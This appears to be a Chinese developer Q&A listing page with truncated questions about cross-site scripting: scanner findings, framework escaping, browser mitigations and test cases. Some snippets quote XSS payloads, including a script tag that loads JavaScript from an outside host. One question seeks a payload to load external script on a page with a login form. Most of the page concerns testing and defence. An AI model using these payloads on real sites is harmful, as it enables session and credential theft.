3回答
我绕过了WAF,并使用onpointerover事件处理程序发现了XSS漏洞。在我发现漏洞的页面中,也有一个登录页面。我可以在onpointerover中使用什么XSS有效负载来加载页面内的外部javascript文件?类似于:onpointerover="load.external.javascript/file.js"
浏览 0提问于2019-09-17得票数 0
1回答
作为一名安全工程师,我想知道web应用程序第三方JS依赖漏洞管理的通用方法。我们有很多应用程序依赖Jquery等,在常规的漏洞扫描中,旧版本的JS库(其中很多版本都有XSS )报告为漏洞。如果没有真正的阅读和理解代码,你就不能说你的应用程序是否会受到那些XSS的影响,这对一个安全工程师来说也不是一件容易的事情。我们有这样的情况:我们将问题归类为漏洞,而不提供实际的XSS攻击。然而,由于努力,开发团队并不乐意对其进行升级。他们建议通过编
浏览 0提问于2021-03-01得票数 2
1回答
对于XSS攻击的vue.js漏洞,我有点困惑。我尝试了几种解决方案:
清理服务器端的输入但问题是,vue.js显示的输入编码(所以我需要使用v-html)完全没有消毒功能,因为在呈现输出时,Vue.js会自动清除输入。在这两种情况下,我都进行了测试:alert('XSS') <script>alert('XSS')</script> {{ alert('XSS'
浏览 28提问于2022-08-10得票数 2
2回答
http://XXX/?subscribe_message=%3Cscript%3Ealert(/zzz/);%3C/script%3E
为什么不弹出/zzz/警告呢?当我在地址栏中做javascript:alert(/zzz/);时,为什么不通过网址呢?看一下源代码让我觉得它/应该/工作..。
浏览 0提问于2014-07-04得票数 0
我遇到了以下漏洞问题:No proper sanitize of xlink:href attribute interoplation, thus vulnerableto Cross-site Scripting (XSS).WS-2017-0120 2017-01-20No proper sanitize of xlink:href attribute interopla
浏览 0提问于2018-11-08得票数 1
1回答
我正在了解浏览器针对XSS漏洞使用的不同缓解措施。浏览器用来防御XSS漏洞的主要技术是什么?XSS-保护头在幕后做什么?还有其他针对XSS的安全层吗?
浏览 0提问于2023-01-19得票数 0
1回答
在普通PHP中,有一些防止XSS (跨站点脚本漏洞:strip_tags()我记得Drupal 7有filter_xss()来防止XSS漏洞,但是针对XSS漏洞的Drupal 8策略是什么呢?
浏览 0提问于2016-07-14得票数 8
回答已采纳
我一直在编写一个测试XSS漏洞的脚本。起初,我只做JavaScript测试,但现在我想为PHP或Perl添加一些。所以我有slingshot.xss/payloads/,还有很多用于JS有效负载的文件夹。我最近创建了一个slingshot.xss/payloads/javascript目录。现在,我想将slingshot.xss/payloads/中的所有文件夹和文件添加到slingshot.xss/
浏览 0提问于2017-04-30得票数 0
回答已采纳
来自CVSS v2 完整指南:我知道跨站点脚本可以分为三种主要类型:反射XSS、存储XSS和基于DOM的XSS。然而,为什么XSS的得分部分影响到完整性,而不是对完整性没有影响?如果XSS漏洞是反射XSS</e
浏览 0提问于2016-10-09得票数 3
我正在学习XSS。我知道HTML SVG对象存在漏洞<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0&
浏览 3提问于2013-06-22得票数 0
1回答
我目前正在研究一些XSS应用程序漏洞,特别是像XSS这样的客户端漏洞。我已经读过关于这个问题的一些话题了。他们说在XHTML中注入恶意代码是可能的。如果Vaadin不再易受XSS攻击,那么(理论上)使用客户端漏洞的方法是什么呢?
浏览 0提问于2016-09-21得票数 1
我从一个客户端收到了一份报告,其中列出了XSS漏洞。报告显示了XSS漏洞的反映。在每个漏洞中,反映的有效载荷是单个未关闭的<qss>。通常,当我阅读xss漏洞时,我会看到许多负载,这些负载将试图关闭apostraphe或输入标记,然后注入一个<script>标记或一些任意的javascript。
<qss>标记的意义是什么?如何在xss攻击中使用它?我在google中唯一发现的就是它是一个qt样式表,但我仍然不理解它
浏览 0提问于2015-01-05得票数 5
回答已采纳
1回答
我的应用程序包含一个安全漏洞(XSS跨站点脚本)。如何确保我的应用程序安全?我是否设置了js框架来保护它?是什么类型的XSS漏洞?是如何引入的,上下文是什么?你在使用什么支柱1
XSS由HTML代码执行,该代码由第三方引入并由应用程序执行。
浏览 0提问于2016-02-22得票数 0
回答已采纳
1回答
我一直在通过gwt (V2.4.0)演示一个示例xss攻击,.I创建了一个带有html文本区域和提交按钮的表单(GET方法),在提交时它通过gwt rpc调用服务器,如果存在xss漏洞,示例测试用例//<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> //不应该是filtered.But --这不起作用,请分享如何执行xss攻击?
浏览 2提问于2012-07-21得票数 1
1回答
下面是一段JS代码: }当我在fortify中测试这段代码时,我遇到了XSS漏洞问题--“该方法将未经验证的数据发送到web浏览器*”。
浏览 0提问于2015-05-03得票数 0
1回答
Xss漏洞
、、
对于我的web应用程序,开发人员报告告诉我,我已经对Acunetix漏洞扫描仪进行了一次审计:DetailsKHTML, like Gecko)Accept: */*但是当我试图复制这个xss漏洞时,我无法重现,为什么?
浏览 1提问于2016-03-03得票数 0
2回答
我正在通过burp套件获得一个XSS漏洞,但是当我手动注入脚本时,我不会得到XSS漏洞。
这是一个可报告的漏洞吗?
浏览 0提问于2018-08-31得票数 0
回答已采纳
1回答
我总是在exprees路由器中看到checkmarx XSS漏洞,不知道用什么其他函数来修复它。我使用了express验证器,但到目前为止还没有成功。).trim().escape().not().isEmpty(), try {
//getting checkmarx xss
浏览 7提问于2021-09-24得票数 0
它发现了一个XSS漏洞。扫描步骤: Injected item: POST: localeCountry <--这是一个枚举值,不能更改为XSS字符串并存储在服务器中。注入值:>'>alert("XSS警告!“)检测值:>'>alert("XSS警告!“)在攻击响应页面中检测到,该页面在链接内找到。我认为这是一个无效的漏洞,因为注入的项目不会持久,也不会影响其他用户。最好避开所有参数,但我想知道这个漏洞</em
浏览 2提问于2012-10-19得票数 0
回答已采纳
云服务器
ICP备案
实时音视频
对象存储
即时通信 IM
腾讯云开发者
